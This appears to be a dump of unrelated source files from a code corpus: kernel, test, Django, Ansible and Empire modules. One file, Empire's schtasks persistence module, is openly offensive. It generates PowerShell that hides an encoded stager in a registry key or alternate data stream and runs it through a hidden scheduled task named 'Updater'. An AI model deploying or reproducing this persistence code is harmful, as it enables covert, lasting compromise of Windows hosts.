elif var in ['Cu', 'Ct', 'uth', 'supply', 'pickup', 'p']:
dims = (u'time', u'y', u'x', u'fractions')
elif var in ['x', 'z', 'zb', 'zs', 'uw', 'udir', 'H']:
dims = (u'time', u'y', u'x')
elif var in []:
dims = (u'time',)
else:
dims = (u'time', u'y', u'x')
return dims
| gpl-2.0 |
awifi-dev/android_kernel_lge_palman | arch/ia64/scripts/unwcheck.py | 13143 | 1714 | #!/usr/bin/python
#
# Usage: unwcheck.py FILE
#
# This script checks the unwind info of each function in file FILE
# and verifies that the sum of the region-lengths matches the total
# length of the function.
#
# Based on a shell/awk script originally written by Harish Patil,
# which was converted to Perl by Matthew Chapman, which was converted
# to Python by David Mosberger.
#
import os
import re
import sys
if len(sys.argv) != 2:
print "Usage: %s FILE" % sys.argv[0]
sys.exit(2)
readelf = os.getenv("READELF", "readelf")
start_pattern = re.compile("<([^>]*)>: \[0x([0-9a-f]+)-0x([0-9a-f]+)\]")
rlen_pattern = re.compile(".*rlen=([0-9]+)")
def check_func (func, slots, rlen_sum):
if slots != rlen_sum:
global num_errors
num_errors += 1
if not func: func = "[%#x-%#x]" % (start, end)
print "ERROR: %s: %lu slots, total region length = %lu" % (func, slots, rlen_sum)
return
num_funcs = 0
num_errors = 0
func = False
slots = 0
rlen_sum = 0
for line in os.popen("%s -u %s" % (readelf, sys.argv[1])):
m = start_pattern.match(line)
if m:
check_func(func, slots, rlen_sum)
func = m.group(1)
start = long(m.group(2), 16)
end = long(m.group(3), 16)
slots = 3 * (end - start) / 16
rlen_sum = 0L
num_funcs += 1
else:
m = rlen_pattern.match(line)
if m:
rlen_sum += long(m.group(1))
check_func(func, slots, rlen_sum)
if num_errors == 0:
print "No errors detected in %u functions." % num_funcs
else:
if num_errors > 1:
err="errors"
else:
err="error"
print "%u %s detected in %u functions." % (num_errors, err, num_funcs)
sys.exit(1)
| gpl-2.0 |
jaredhaight/Empire | lib/modules/persistence/userland/schtasks.py | 9 | 9526 | import os
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Invoke-Schtasks',
'Author': ['@mattifestation', '@harmj0y'],
'Description': ('Persist a stager (or script) using schtasks. This has a moderate detection/removal rating.'),
'Background' : False,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : False,
'MinPSVersion' : '2',
'Comments': [
'https://github.com/mattifestation/PowerSploit/blob/master/Persistence/Persistence.psm1'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use.',
'Required' : False,
'Value' : ''
},
'DailyTime' : {
'Description' : 'Daily time to trigger the script (HH:mm).',
'Required' : False,
'Value' : '09:00'
},
'IdleTime' : {
'Description' : 'User idle time (in minutes) to trigger script.',
'Required' : False,
'Value' : ''
},
'TaskName' : {
'Description' : 'Name to use for the schtask.',
'Required' : True,
'Value' : 'Updater'
},
'RegPath' : {
'Description' : 'Registry location to store the script code. Last element is the key name.',
'Required' : False,
'Value' : 'HKCU:\Software\Microsoft\Installer\debug'
},
'ADSPath' : {
'Description' : 'Alternate-data-stream location to store the script code.',
'Required' : False,
'Value' : ''
},
'ExtFile' : {
'Description' : 'Use an external file for the payload instead of a stager.',
'Required' : False,
'Value' : ''
},
'Cleanup' : {
'Description' : 'Switch. Cleanup the trigger and any script from specified location.',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
listenerName = self.options['Listener']['Value']
# trigger options
dailyTime = self.options['DailyTime']['Value']
idleTime = self.options['IdleTime']['Value']
taskName = self.options['TaskName']['Value']
# storage options
regPath = self.options['RegPath']['Value']
adsPath = self.options['ADSPath']['Value']
# management options
extFile = self.options['ExtFile']['Value']
cleanup = self.options['Cleanup']['Value']
# staging options
userAgent = self.options['UserAgent']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
statusMsg = ""
locationString = ""
# for cleanup, remove any script from the specified storage location
# and remove the specified trigger
if cleanup.lower() == 'true':
if adsPath != '':
# remove the ADS storage location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo x > "+adsPath+"\"};"
else:
# remove the script stored in the registry at the specified reg path
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Remove-ItemProperty -Force -Path $path -Name $name;"
script += "schtasks /Delete /F /TN "+taskName+";"
script += "'Schtasks persistence removed.'"
return script
if extFile != '':
# read in an external file as the payload and build a
# base64 encoded version as encScript
if os.path.exists(extFile):
f = open(extFile, 'r')
fileData = f.read()
f.close()
# unicode-base64 encode the script for -enc launching
encScript = helpers.enc_powershell(fileData)
statusMsg += "using external file " + extFile
else:
print helpers.color("[!] File does not exist: " + extFile)
return ""
else:
# if an external file isn't specified, use a listener
if not self.mainMenu.listeners.is_listener_valid(listenerName):
# not a valid listener, return nothing for the script
print helpers.color("[!] Invalid listener: " + listenerName)
return ""
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds)
encScript = launcher.split(" ")[-1]
statusMsg += "using listener " + listenerName
if adsPath != '':
# store the script in the specified alternate data stream location
if ".txt" not in adsPath:
print helpers.color("[!] For ADS, use the form C:\\users\\john\\AppData:blah.txt")
return ""
script = "Invoke-Command -ScriptBlock {cmd /C \"echo "+encScript+" > "+adsPath+"\"};"
locationString = "$(cmd /c \''\''more < "+adsPath+"\''\''\'')"
else:
# otherwise store the script into the specified registry location
path = "\\".join(regPath.split("\\")[0:-1])
name = regPath.split("\\")[-1]
statusMsg += " stored in " + regPath
script = "$RegPath = '"+regPath+"';"
script += "$parts = $RegPath.split('\\');"
script += "$path = $RegPath.split(\"\\\")[0..($parts.count -2)] -join '\\';"
script += "$name = $parts[-1];"
script += "$null=Set-ItemProperty -Force -Path $path -Name $name -Value "+encScript+";"
# note where the script is stored
locationString = "(gp "+path+" "+name+")."+name
# built the command that will be triggered by the schtask
triggerCmd = "'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NonI -W hidden -c \\\"IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String("+locationString+")))\\\"'"
# sanity check to make sure we haven't exceeded the cmd.exe command length max
if len(triggerCmd) > 259:
print helpers.color("[!] Warning: trigger command exceeds the maximum of 259 characters.")
return ""
if idleTime != '':
script += "schtasks /Create /F /SC ONIDLE /I "+idleTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" idle trigger on " + idleTime + "."
else:
# otherwise assume we're doing a daily trigger
script += "schtasks /Create /F /SC DAILY /ST "+dailyTime+" /TN "+taskName+" /TR "+triggerCmd+";"
statusMsg += " with "+taskName+" daily trigger at " + dailyTime + "."
script += "'Schtasks persistence established "+statusMsg+"'"
return script | bsd-3-clause |
theelous3/asks | tests/test_anyio.py | 1 | 18950 | # pylint: disable=wrong-import-position
import ssl
from os import path
from functools import partial
from pathlib import Path
import h11
import pytest
from anyio import create_task_group, open_file, EndOfStream
from overly import (
Server,
ssl_socket_wrapper,
default_ssl_cert,
send_200,
send_303,
send_400,
send_500,
delay,
send_request_as_json,
accept_cookies_and_respond,
send_gzip,
send_deflate,
send_chunked,
send_200_blank_headers,
finish,
HttpMethods,
)
import asks
from asks.request_object import RequestProcessor
from asks.errors import TooManyRedirects, BadStatus, RequestTimeout
pytestmark = pytest.mark.anyio
_TEST_LOC = ("localhost", 25001)
_SSL_CONTEXT = ssl.create_default_context(cadata=default_ssl_cert)
@pytest.fixture
def server(request):
srv = Server(_TEST_LOC, **request.param)
srv.daemon = True
srv.start()
srv.ready_to_go.wait()
yield srv
srv.kill_threads = True
srv.join()
@pytest.mark.parametrize('server', [dict(steps=[send_200, finish])], indirect=True)
async def test_http_get(server):
r = await asks.get(server.http_test_url)
assert r.status_code == 200
# GET tests
@pytest.mark.parametrize('server', [
dict(steps=[send_200, finish], socket_wrapper=ssl_socket_wrapper)
], indirect=True)
async def test_https_get(server, caplog):
import logging
caplog.set_level(logging.DEBUG)
# If we use ssl_context= to trust the CA, then we can successfully do a
# GET over https.
r = await asks.get(server.https_test_url, ssl_context=_SSL_CONTEXT)
assert r.status_code == 200
@pytest.mark.parametrize('server', [
dict(steps=[send_200, finish], socket_wrapper=ssl_socket_wrapper)
], indirect=True)
async def test_https_get_checks_cert(server):
try:
expected_error = ssl.SSLCertVerificationError
except AttributeError:
# If we're running in Python <3.7, we won't have the specific error
# that will be raised, but we can expect it to raise an SSLError
# nonetheless
expected_error = ssl.SSLError
# The server's certificate isn't signed by any real CA. By default, asks
# should notice that, and raise an error.
with pytest.raises(expected_error):
await asks.get(server.https_test_url)
# # async def test_bad_www_and_schema_get():
# r = await asks.get('http://reddit.com')
# assert r.status_code == 200
@pytest.mark.parametrize('server', [dict(steps=[send_400, finish])], indirect=True)
async def test_http_get_client_error(server):
r = await asks.get(server.http_test_url)
with pytest.raises(BadStatus) as excinfo:
r.raise_for_status()
assert excinfo.match("400 Client Error: BAD REQUEST")
assert excinfo.value.status_code == 400
@pytest.mark.parametrize('server', [dict(steps=[send_500, finish])], indirect=True)
async def test_http_get_server_error(server):
r = await asks.get(server.http_test_url)
with pytest.raises(BadStatus) as excinfo:
r.raise_for_status()
assert excinfo.match("500 Server Error: INTERNAL SERVER ERROR")
assert excinfo.value.status_code == 500
# Redirect tests
@pytest.mark.parametrize('server', [
dict(
max_requests=4,
steps=[
[(HttpMethods.GET, "/redirect_1"), send_303, finish],
[(HttpMethods.GET, "/"), send_200, finish],
[(HttpMethods.GET, "/redirect_1"), send_303, finish],
[(HttpMethods.GET, "/"), send_200, finish],
],
ordered_steps=True,
)
], indirect=True)
async def test_http_redirect(server):
r = await asks.get(server.http_test_url + "/redirect_1")
assert len(r.history) == 1
# make sure history doesn't persist across responses
r.history.append("not a response obj")
r = await asks.get(server.http_test_url + "/redirect_1")
assert len(r.history) == 1
@pytest.mark.parametrize('server', [
dict(
max_requests=3,
steps=[
[
(HttpMethods.GET, "/redirect_max"),
partial(send_303, headers=[("location", "redirect_max1")]),
finish,
],
[
(HttpMethods.GET, "/redirect_max1"),
partial(send_303, headers=[("location", "redirect_max")]),
finish,
],
],
)
], indirect=True)
async def test_http_max_redirect_error(server):
with pytest.raises(TooManyRedirects):
await asks.get(server.http_test_url + "/redirect_max", max_redirects=1)
@pytest.mark.parametrize('server', [
dict(
max_requests=2,
steps=[
[
(HttpMethods.GET, "/path/redirect"),
partial(send_303, headers=[("location", "../foo/bar")]),
finish,
],
[(HttpMethods.GET, "/foo/bar"), send_200, finish],
],
)
], indirect=True)
async def test_redirect_relative_url(server):
r = await asks.get(server.http_test_url + "/path/redirect", max_redirects=1)
assert len(r.history) == 1
assert r.url == "http://{0}:{1}/foo/bar".format(*_TEST_LOC)
@pytest.mark.parametrize('server', [
dict(
max_requests=2,
steps=[
[
(HttpMethods.GET, "/redirect_once"),
partial(send_303, headers=[("location", "/")]),
finish,
],
[(HttpMethods.GET, "/"), send_200, finish],
],
)
], indirect=True)
async def test_http_under_max_redirect(server):
r = await asks.get(server.http_test_url + "/redirect_once", max_redirects=2)
assert r.status_code == 200
@pytest.mark.parametrize('server', [
dict(
max_requests=1,
steps=[
[
(HttpMethods.GET, "/redirect_once"),
partial(send_303, headers=[("location", "/")]),
finish,
],
],
)
], indirect=True)
async def test_dont_follow_redirects(server):
r = await asks.get(server.http_test_url + "/redirect_once", follow_redirects=False)
assert r.status_code == 303
assert r.headers["location"] == "/"
# Timeout tests
@pytest.mark.parametrize('server', [dict(steps=[delay(2), send_200, finish])], indirect=True)
async def test_http_timeout_error(server):
with pytest.raises(RequestTimeout):
await asks.get(server.http_test_url, timeout=1)
@pytest.mark.parametrize('server', [dict(steps=[send_200, finish])], indirect=True)
async def test_http_timeout(server):
r = await asks.get(server.http_test_url, timeout=10)
assert r.status_code == 200
# Param set test
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_param_dict_set(server):
r = await asks.get(server.http_test_url, params={"cheese": "the best"})
j = r.json()
assert next(v == "the best" for k, v in j["params"] if k == "cheese")
# Data set test
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_data_dict_set(server):
r = await asks.post(server.http_test_url, data={"cheese": "please bby"})
j = r.json()
assert next(v == "please bby" for k, v in j["form"] if k == "cheese")
# Cookie send test
@pytest.mark.parametrize('server', [
dict(steps=[accept_cookies_and_respond, finish])
], indirect=True)
async def test_cookie_dict_send(server):
cookies = {"Test-Cookie": "Test Cookie Value", "koooookie": "pie"}
r = await asks.get(server.http_test_url, cookies=cookies)
for cookie in r.cookies:
assert cookie.name in cookies
if " " in cookie.value:
assert cookie.value == '"' + cookies[cookie.name] + '"'
else:
assert cookie.value == cookies[cookie.name]
# Custom headers test
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_header_set(server):
r = await asks.get(
server.http_test_url, headers={"Asks-Header": "Test Header Value"}
)
j = r.json()
assert any(k == "asks-header" for k, _ in j["headers"])
assert "cOntenT-tYPe" in r.headers
# File send test
TEST_DIR = path.dirname(path.abspath(__file__))
TEST_FILE1 = path.join(TEST_DIR, "test_file1.txt")
TEST_FILE2 = path.join(TEST_DIR, "test_file2")
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_file_send_single(server):
r = await asks.post(server.http_test_url, files={"file_1": TEST_FILE1})
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
file_data = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data["file"] == "Compooper"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_file_send_double(server):
r = await asks.post(
server.http_test_url, files={"file_1": TEST_FILE1, "file_2": TEST_FILE2}
)
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
assert any(file_data["name"] == "file_2" for file_data in j["files"])
file_data_1 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
file_data_2 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_2"
)
assert file_data_1["file"] == "Compooper"
assert file_data_2["file"] == "My slug <3"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_file_send_file_and_form_data(server):
r = await asks.post(
server.http_test_url,
files={"file_1": TEST_FILE1, "data_1": "watwatwatwat=yesyesyes"},
)
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
assert any(form_data["name"] == "data_1" for form_data in j["forms"])
file_data_1 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data_1["file"] == "Compooper"
form_data_1 = next(
form_data for form_data in j["forms"] if form_data["name"] == "data_1"
)
assert form_data_1["form_data"] == "watwatwatwat=yesyesyes"
# File send test new multipart API
TEST_DIR = path.dirname(path.abspath(__file__))
TEST_FILE1 = path.join(TEST_DIR, "test_file1.txt")
TEST_FILE2 = path.join(TEST_DIR, "test_file2")
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_single(server):
r = await asks.post(server.http_test_url, multipart={"file_1": Path(TEST_FILE1)})
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
file_data = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data["file"] == "Compooper"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_single_already_open(server):
with open(TEST_FILE1, "rb") as f:
r = await asks.post(server.http_test_url, multipart={"file_1": f})
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
file_data = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data["file"] == "Compooper"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_single_already_open_async(server):
async with await open_file(TEST_FILE1, "rb") as f:
r = await asks.post(server.http_test_url, multipart={"file_1": f})
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
file_data = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data["file"] == "Compooper"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_raw_bytes(server):
r = await asks.post(
server.http_test_url,
multipart={
"file_1": asks.multipart.MultipartData(
b"Compooper", basename="in_memory.txt",
)
},
)
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
file_data = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data["file"] == "Compooper"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_double(server):
r = await asks.post(
server.http_test_url,
multipart={"file_1": Path(TEST_FILE1), "file_2": Path(TEST_FILE2)},
)
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
assert any(file_data["name"] == "file_2" for file_data in j["files"])
file_data_1 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
file_data_2 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_2"
)
assert file_data_1["file"] == "Compooper"
assert file_data_2["file"] == "My slug <3"
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_multipart_send_file_and_form_data(server):
r = await asks.post(
server.http_test_url,
multipart={"file_1": Path(TEST_FILE1), "data_1": "watwatwatwat=yesyesyes"},
)
j = r.json()
assert any(file_data["name"] == "file_1" for file_data in j["files"])
assert any(form_data["name"] == "data_1" for form_data in j["forms"])
file_data_1 = next(
file_data for file_data in j["files"] if file_data["name"] == "file_1"
)
assert file_data_1["file"] == "Compooper"
form_data_1 = next(
form_data for form_data in j["forms"] if form_data["name"] == "data_1"
)
assert form_data_1["form_data"] == "watwatwatwat=yesyesyes"
# JSON send test
@pytest.mark.parametrize('server', [dict(steps=[send_request_as_json, finish])], indirect=True)
async def test_json_send(server):
r = await asks.post(
server.http_test_url, json={"key_1": True, "key_2": "cheesestring"}
)
j = r.json()
json_1 = next(iter(j["json"]))
assert json_1["json"]["key_1"] is True
assert json_1["json"]["key_2"] == "cheesestring"
# Test decompression
@pytest.mark.parametrize('server', [
dict(steps=[partial(send_gzip, data="wolowolowolo"), finish])
], indirect=True)
async def test_gzip(server):
r = await asks.get(server.http_test_url)
assert r.text == "wolowolowolo"
@pytest.mark.parametrize('server', [
dict(steps=[partial(send_deflate, data="wolowolowolo"), finish])
], indirect=True)
async def test_deflate(server):
r = await asks.get(server.http_test_url)
assert r.text == "wolowolowolo"
# Test chunks and streaming
@pytest.mark.parametrize('server', [
dict(steps=[partial(send_chunked, data=["ham "] * 10), finish])
], indirect=True)
async def test_chunked(server):
r = await asks.get(server.http_test_url)
assert r.text == "ham ham ham ham ham ham ham ham ham ham "
@pytest.mark.parametrize('server', [
dict(steps=[partial(send_chunked, data=["ham "] * 10), finish])
], indirect=True)
async def test_stream(server):
data = b""
r = await asks.get(server.http_test_url, stream=True)
async for chunk in r.body:
data += chunk
assert data == b"ham ham ham ham ham ham ham ham ham ham "
# Test callback
@pytest.mark.parametrize('server', [
dict(steps=[partial(send_chunked, data=["ham "] * 10), finish])
], indirect=True)
async def test_callback(server):
async def callback_example(chunk):
nonlocal callback_data
callback_data += chunk
callback_data = b""
await asks.get(server.http_test_url, callback=callback_example)
assert callback_data == b"ham ham ham ham ham ham ham ham ham ham "
# Test connection close without content-length and transfer-encoding
@pytest.mark.parametrize('server', [
dict(
steps=[partial(send_200_blank_headers, headers=[("connection", "close")]), finish],
)
], indirect=True)
async def test_connection_close_no_content_len(server):
r = await asks.get(server.http_test_url)
assert r.text == "200"
# Session Tests
# =============
# Test Session with two pooled connections on ten get requests.
@pytest.mark.parametrize('server', [
dict(
steps=[partial(send_200_blank_headers, headers=[("connection", "close")]), finish],
max_requests=10,
)
], indirect=True)
async def test_session_smallpool(server):
async def worker(s):
r = await s.get(path="/get")
assert r.status_code == 200
s = asks.Session(server.http_test_url, connections=2)
async with create_task_group() as g:
for _ in range(10):
await g.spawn(worker, s)
# Test stateful Session
# TODO check the "" quoting of cookies here (probably in overly)
@pytest.mark.parametrize('server', [
dict(steps=[accept_cookies_and_respond, finish])
], indirect=True)
async def test_session_stateful(server):
s = asks.Session(server.http_test_url, persist_cookies=True)
await s.get(cookies={"Test-Cookie": "Test Cookie Value"})
assert ":".join(str(x) for x in _TEST_LOC) in s._cookie_tracker.domain_dict.keys()
assert (
s._cookie_tracker.domain_dict[":".join(str(x) for x in _TEST_LOC)][0].value
== '"Test Cookie Value"'
)
# Test session instantiates outside event loop
def test_instantiate_session_outside_of_event_loop():
try:
asks.Session()
except RuntimeError:
pytest.fail("Could not instantiate Session outside of event loop")
async def test_session_unknown_kwargs():
with pytest.raises(TypeError, match=r"request\(\) got .*"):
session = asks.Session("https://httpbin.org/get")
await session.request("GET", ko=7, foo=0, bar=3, shite=3)
pytest.fail("Passing unknown kwargs does not raise TypeError")
async def test_recv_event_anyio2_end_of_stream():
class MockH11Connection:
def __init__(self):
self.data = None
def next_event(self):
if self.data == b"":
return h11.PAUSED
else:
return h11.NEED_DATA
def receive_data(self, data):
self.data = data
class MockSock:
def receive(self):
raise EndOfStream
req = RequestProcessor(None, "get", "toot-toot", None)
req.sock = MockSock()
h11_connection = MockH11Connection()
event = await req._recv_event(h11_connection)
assert event is h11.PAUSED
assert h11_connection.data == b""
| mit |
quxiaolong1504/django | tests/builtin_server/tests.py | 368 | 5230 | from __future__ import unicode_literals
import sys
import traceback
from io import BytesIO
from unittest import TestCase
from wsgiref import simple_server
# If data is too large, socket will choke, so write chunks no larger than 32MB
# at a time. The rationale behind the 32MB can be found on Django's Trac:
# https://code.djangoproject.com/ticket/5596#comment:4
MAX_SOCKET_CHUNK_SIZE = 32 * 1024 * 1024 # 32 MB
class ServerHandler(simple_server.ServerHandler, object):
    """WSGI server handler that writes large responses in bounded chunks.

    Writing one huge bytestring can choke the socket, so write() splits the
    payload into MAX_SOCKET_CHUNK_SIZE pieces (see the module constant).
    """
    error_status = str("500 INTERNAL SERVER ERROR")

    def write(self, data):
        """'write()' callable as specified by PEP 3333"""
        assert isinstance(data, bytes), "write() argument must be bytestring"
        if not self.status:
            raise AssertionError("write() before start_response()")
        elif not self.headers_sent:
            # Before the first output, send the stored headers
            self.bytes_sent = len(data)  # make sure we know content-length
            self.send_headers()
        else:
            self.bytes_sent += len(data)
        # XXX check Content-Length and truncate if too many bytes written?
        # Stream the payload through a BytesIO so each chunk read is at most
        # MAX_SOCKET_CHUNK_SIZE; flush after every chunk.
        data = BytesIO(data)
        for chunk in iter(lambda: data.read(MAX_SOCKET_CHUNK_SIZE), b''):
            self._write(chunk)
            self._flush()

    def error_output(self, environ, start_response):
        # Include the traceback in the error response body to aid debugging.
        super(ServerHandler, self).error_output(environ, start_response)
        return ['\n'.join(traceback.format_exception(*sys.exc_info()))]

    # Backport of http://hg.python.org/cpython/rev/d5af1b235dab. See #16241.
    # This can be removed when support for Python <= 2.7.3 is deprecated.
    def finish_response(self):
        try:
            if not self.result_is_file() or not self.sendfile():
                for data in self.result:
                    self.write(data)
                self.finish_content()
        finally:
            self.close()
class DummyHandler(object):
    """No-op request handler: silently swallows log_request() calls."""

    def log_request(self, *args, **kwargs):
        # Intentionally silent - the tests do not want request logging.
        return None
class FileWrapperHandler(ServerHandler):
    """ServerHandler that records whether sendfile() was invoked."""

    def __init__(self, *args, **kwargs):
        super(FileWrapperHandler, self).__init__(*args, **kwargs)
        self._used_sendfile = False
        self.request_handler = DummyHandler()

    def sendfile(self):
        # Pretend the platform sendfile path succeeded, and remember it.
        self._used_sendfile = True
        return True
def wsgi_app(environ, start_response):
    """Trivial WSGI app: respond 200 OK with a plain-text greeting."""
    status = str('200 OK')
    headers = [(str('Content-Type'), str('text/plain'))]
    start_response(status, headers)
    return [b'Hello World!']
def wsgi_app_file_wrapper(environ, start_response):
    """WSGI app that returns its body via environ['wsgi.file_wrapper']."""
    start_response(str('200 OK'), [(str('Content-Type'), str('text/plain'))])
    wrapper = environ['wsgi.file_wrapper']
    return wrapper(BytesIO(b'foo'))
class WSGIFileWrapperTests(TestCase):
    """
    Test that wsgi.file_wrapper works for the builtin server.

    Tests for #9659: wsgi.file_wrapper in the builtin server.
    We mock a couple of handlers and keep track of what gets called
    when using a couple kinds of WSGI apps.
    """

    def _run_app(self, app):
        # Drive `app` through a FileWrapperHandler and return the handler.
        env = {'SERVER_PROTOCOL': 'HTTP/1.0'}
        handler = FileWrapperHandler(None, BytesIO(), BytesIO(), env)
        handler.run(app)
        return handler

    def test_file_wrapper_uses_sendfile(self):
        handler = self._run_app(wsgi_app_file_wrapper)
        self.assertTrue(handler._used_sendfile)
        self.assertEqual(handler.stdout.getvalue(), b'')
        self.assertEqual(handler.stderr.getvalue(), b'')

    def test_file_wrapper_no_sendfile(self):
        handler = self._run_app(wsgi_app)
        self.assertFalse(handler._used_sendfile)
        self.assertEqual(handler.stdout.getvalue().splitlines()[-1], b'Hello World!')
        self.assertEqual(handler.stderr.getvalue(), b'')
class WriteChunkCounterHandler(ServerHandler):
    """
    Server handler that counts the number of chunks written after headers were
    sent. Used to make sure large response body chunking works properly.
    """

    def __init__(self, *args, **kwargs):
        super(WriteChunkCounterHandler, self).__init__(*args, **kwargs)
        self.request_handler = DummyHandler()
        self.write_chunk_counter = 0
        self.headers_written = False

    def send_headers(self):
        super(WriteChunkCounterHandler, self).send_headers()
        self.headers_written = True

    def _write(self, data):
        # Only count body chunks, i.e. writes after the headers went out.
        if self.headers_written:
            self.write_chunk_counter += 1
        self.stdout.write(data)
def send_big_data_app(environ, start_response):
    """WSGI app returning one blob 1.5 times the maximum chunk size."""
    start_response(str('200 OK'), [(str('Content-Type'), str('text/plain'))])
    blob_size = MAX_SOCKET_CHUNK_SIZE + MAX_SOCKET_CHUNK_SIZE // 2
    return [b'x' * blob_size]
class ServerHandlerChunksProperly(TestCase):
    """
    Test that the ServerHandler chunks data properly.

    Tests for #18972: The logic that performs the math to break data into
    32MB (MAX_SOCKET_CHUNK_SIZE) chunks was flawed, BUT it didn't actually
    cause any problems.
    """

    def test_chunked_data(self):
        handler = WriteChunkCounterHandler(
            None, BytesIO(), BytesIO(), {'SERVER_PROTOCOL': 'HTTP/1.0'})
        handler.run(send_big_data_app)
        # 1.5x MAX_SOCKET_CHUNK_SIZE must be split into exactly two writes.
        self.assertEqual(handler.write_chunk_counter, 2)
| bsd-3-clause |
roadmapper/ansible | lib/ansible/modules/network/aci/aci_maintenance_group_node.py | 5 | 6223 | #!/usr/bin/python
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = r'''
---
module: aci_maintenance_group_node
short_description: Manage maintenance group nodes
version_added: '2.8'
description:
- Manage maintenance group nodes
options:
group:
description:
- The maintenance group name that you want to add the node to.
type: str
required: true
node:
description:
- The node to be added to the maintenance group.
- The value equals the nodeid.
type: str
required: true
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
type: str
choices: [ absent, present, query ]
default: present
name_alias:
version_added: '2.10'
description:
- The alias for the current object. This relates to the nameAlias field in ACI.
type: str
extends_documentation_fragment:
- aci
author:
- Steven Gerhart (@sgerhart)
'''
EXAMPLES = r'''
- name: maintenance group
aci_maintenance_group_node:
host: "{{ inventory_hostname }}"
username: "{{ user }}"
password: "{{ pass }}"
validate_certs: no
group: maintenancegrp1
node: 1001
state: present
- name: maintenance group
aci_maintenance_group_node:
host: "{{ inventory_hostname }}"
username: "{{ user }}"
password: "{{ pass }}"
validate_certs: no
group: maintenancegrp1
node: 1002
state: absent
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: str
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
